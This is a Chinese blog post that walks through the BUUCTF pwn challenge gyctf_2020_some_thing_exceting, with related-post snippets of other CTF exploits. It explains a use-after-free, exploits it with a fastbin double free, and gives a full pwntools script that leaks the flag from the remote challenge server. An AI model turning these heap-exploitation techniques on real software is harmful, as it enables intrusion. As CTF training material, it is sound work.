【buuctf】gyctf_2020_some_thing_exceting

最新推荐文章于 2022-12-27 17:07:15 发布
最新推荐文章于 2022-12-27 17:07:15 发布
阅读量317 收藏
点赞数
分类专栏: buuctf刷题 文章标签: 安全 linux pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51055545/article/details/125923978
版权

[buuctf]gyctf_2020_some_thing_exceting

例行检查

image-20220722002636111

64位程序,关闭了pie保护,直接放到ida分析;

IDA分析

主函数开始时,调用函数,将flag文件打开,注意是在根目录下的flag,然后将flag读到全局变量s处,这个0x60很有帮助,构成了一个堆头;

image-20220722002749874

漏洞点在删除功能处,

image-20220722003000258

将堆块释放后,未将指针置空,存在uaf;

漏洞利用

先申请2个查看堆布局;

image-20220722003216889

程序申请的0x10的堆块起到了存放指针的作用,很正常的堆布局,直接double free,去改指针;

flag = 0x6020A8-0x10

add(0x50,'AAAAAAA',0x50,'BBBBBBB')
add(0x50,'aaa',0x50,'bbb')

free(0)
show(0)

free(1)
free(0)
add(0x50,p64(flag),0x50,'AAA')

这里注意要劫持的堆地址为s-0x10,此时;

image-20220722003504053

连续申请两次,再show,即可读出flag.

exp

from pwn import *
elf = ELF('./gyctf_2020_some_thing_exceting')
io = remote('node4.buuoj.cn',25196)
#io = process('./gyctf_2020_some_thing_exceting')
libc = elf.libc
context(log_level='debug')

def choice(c):
	io.recvuntil(':')
	io.sendline(str(c))

def add(ba_size,ba_content,na_size,na_content):
	choice(1)
	io.recvuntil(':')
	io.sendline(str(ba_size))
	io.recvuntil(':')
	io.send(ba_content)
	io.recvuntil(':')
	io.sendline(str(na_size))
	io.recvuntil(':')
	io.send(na_content)

def free(index):
	choice(3)
	io.recvuntil(':')
	io.sendline(str(index))

def show(index):
	choice(4)
	io.recvuntil(':')
	io.sendline(str(index))

flag = 0x6020A8-0x10

add(0x50,'AAAAAAA',0x50,'BBBBBBB')
add(0x50,'aaa',0x50,'bbb')

free(0)
show(0)

free(1)
free(0)
add(0x50,p64(flag),0x50,'AAA')

add(0x50,'AA',0x50,'AAA')

add(0x50,'f',0x60,'AAAA')

show(0)

#gdb.attach(io)


io.interactive()

image-20220722003636623

拿到flag!!!

Leee333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pwngyctf_2020_borrowstack
Nothing
03-02 1614
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
[BUUCTF]PWN——gyctf_2020_some_thing_exceting
mcmuyanga的博客
01-22 790
gyctf_2020_some_thing_exceting 附件 步骤: 例行检查,64位程序,除了PIE,其他保护全开 本地试运行一下,看看大概的情况 64位ida载入,检索字符串的时候发现了有关flag的信息,由于我本地上没有创建flag文件,所以一开始输出了12行的puts 创建了一个flag,在执行,可以看到经典的堆的菜单 main(),程序主要有3个功能add,delete和show add() delete() show() 利用思路 程序一开始就读入了fl
gyctf_2020_some_thing_exceting
z1r0的博客
01-20 366
gyctf_2020_some_thing_exceting 查看保护 有uaf flag被存放在了bss段。 放flag的这里的size大小是0x60,在2.23下会检查size的大小是否与fastbin 对应的大小一样。 所以进行fastbin释放时,申请的堆块为0x50即可。fastbin double free attack即可。最后申请0x40的原因是因为0x50对应的fastbin里double free之后会有东西,所以申请其它大小的堆块。 from pwn import * con
[BUUCTF]PWN——gyctf_2020_some_thing_interesting(格式化字符串+UAF)
mcmuyanga的博客
03-11 824
gyctf_2020_some_thing_interesting 附件 步骤 例行检查,64位程序,保护全开 本地试运行一下程序,看看大概的情况 64位ida载入 sub_B7A() check() create()
fm.rar_Thing Thing_python
09-23
描述中的"it is go come say some thing in the web intenet"虽然语法不清晰,但可以推测可能是指这个"Thing Thing"与Web互联网交互有关,可能是Web应用或者网络通信的一部分。 在IT行业中,Python是一种高级、通用...
XXX.zip_Some of the Parts
09-23
THIS IS A LIBRARY MANAGEMENT SYSTEM IMPLEMENTED IN C YOU CAN USE SOME PARTS OF THE CODE IN YOUR PROGRAM BUT NOT THIS PROGRAM CAN BE PLUBISHED WITHOUT THE AGREEMENT OF THE AUTHOR
WATERSHED.zip_Some Nerve
07-14
I did some preproccessing to the nerve images and then applied the watershed transformation. Now, I want to join the continuous points in watershed segmented image and delete the random points from ...
遗传算法.zip_some9ju_遗传算法
07-15
有用的遗传算法实例,有助于学习遗传算法,欢迎下载
Take_some_contents.zip_file content c++
09-14
标题 "Take_some_contents.zip_file content c++" 暗示我们关注的是使用C++语言处理文件内容的主题。在这个场景中,我们可能需要了解如何在C++中读取、操作和提取文件中的特定字符或字符串。 描述 "Take some ...
gyctf_2020_some_thing_interesting
m0_57754423的博客
04-13 354
exp: from pwn import * p = remote("node4.buuoj.cn",26410) # p = process("./something") e = ELF("./something") libc = ELF("libc-2.23.so") def dbg(): gdb.attach(p) pause() p.recvuntil("> Input your code please:") p.sendline("OreOOrereOOreO%17$p
【buuoj】gyctf_2020_some_thing_interesting1
qq_42220888的博客
12-27 100
buuoj gyctf_2020_some_thing_interesting 1 做题有感
gyctf_2020_some_thing_interesting(fmt泄露libc,doublefree)
m0_51251108的博客
11-13 420
gyctf_2020_some_thing_interesting: 保护全开 漏洞分析: 字符串只比较到第14个,还有5个我们可以任意填 这里有个格式化字符串漏洞 指针未清零 漏洞利用: gbd调试可以看到偏移的地址指向啥,例如偏移17,指向__libc_start_main+240,我们靠此泄露libc 再利用doublefree,分配chunk到malloc_hook-0x23中,改malloc_hook为og 去getshell exp: 这题free时会释放两个堆,甚至帮我们绕过doubl
i春秋新春战役PWN之Some_thing_exceting
像初雪一样自由洒落
03-09 675
心好累,堆处入手,看明白了,可是总是复盘实现不了。。。不过学长那边可以,是我机子的问题?? 题目链接:https://pan.baidu.com/s/1Tv5Y4ieNVEasZ8oAYYn2Lw 提取码:5td6 文件查看一下 拿到程序发现运行不了,查看文件属性,发现没有执行权限,加一个执行权限 执行不了 因为程序要打开/flag(根目录下flag)文件 ...
gyctf_2020_borrowstack
qq_42728977的博客
04-12 543
栈迁移,这个有点坑。 参考: https://www.cnblogs.com/luoleqi/p/12348341.html
GYCTF 2020-borrowstack
Eagle_hwei的博客
03-12 1021
borrowstack的题目分析 2020-03-1210:46:10 by hawkJW 题目附件、ida文件及wp链接   这道题的漏洞很明显,思路也比较明显,但就是有坑!!!学习一下 1. 程序流程总览 首先,按照惯例,我们看一下程序开启的保护措施,如图所示 除了栈上不可以执行以外,其余的保护措施基本没有开启,因此该程序的保护措施还是比较松的。 下面我们来粗略的浏览一下...
BUUCTF-PWN刷题记录-2
weixin_44145820的博客
03-15 620
目录gyctf_2020_borrowstack gyctf_2020_borrowstack 本题只有有限的溢出空间,而且有NX的保护,只能用ROP的办法 利用方法为把rbp改为bank+4的地址,返回地址改为leave的地址,这样就能利用RBP修改RSP,bank前8个字节填写bank+8的地址,之后跟上ROP链, 不过这题还有一点,就是Bank离stdin和stdout比较近,需要先使用...
BUUCTF:[GYCTF2020]EasyThinking
末初的CSDN博客
03-28 3463
参考:https://www.cnblogs.com/yesec/p/12571861.html 目录扫描,存在源码泄露www.zip ThinkPHP框架 ThinPHPV6.0.0 漏洞成因:ThinkPHP6任意文件操作漏洞分析 session可控,修改session,长度为32位,session后缀改为.php(加上.php后为32位) 然后再search搜索的内容会直接保存在/ru...
No module named 'some_module'
最新发布
04-21
当你在Python中遇到"No module named 'some_module'"的错误时,这通常意味着你尝试导入一个不存在的模块或者模块名称拼写错误。 要解决这个问题,你可以采取以下几个步骤: 1. 检查模块名称拼写:确保你正确地输入了模块的名称。Python对大小写敏感,所以请确保大小写匹配。 2. 检查模块是否存在:确认你尝试导入的模块确实存在于你的Python环境中。你可以使用命令`pip list`来查看已安装的模块列表,或者在Python交互式环境中尝试导入该模块。 3. 安装缺失的模块:如果你确定模块存在但尚未安装,你可以使用`pip install`命令来安装它。例如,如果你想安装名为"some_module"的模块,可以运行`pip install some_module`来安装它。 4. 检查Python环境:有时候,你可能在错误的Python环境中运行代码,导致无法找到模块。确保你在正确的Python环境中运行代码,或者在虚拟环境中安装和运行代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leee333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值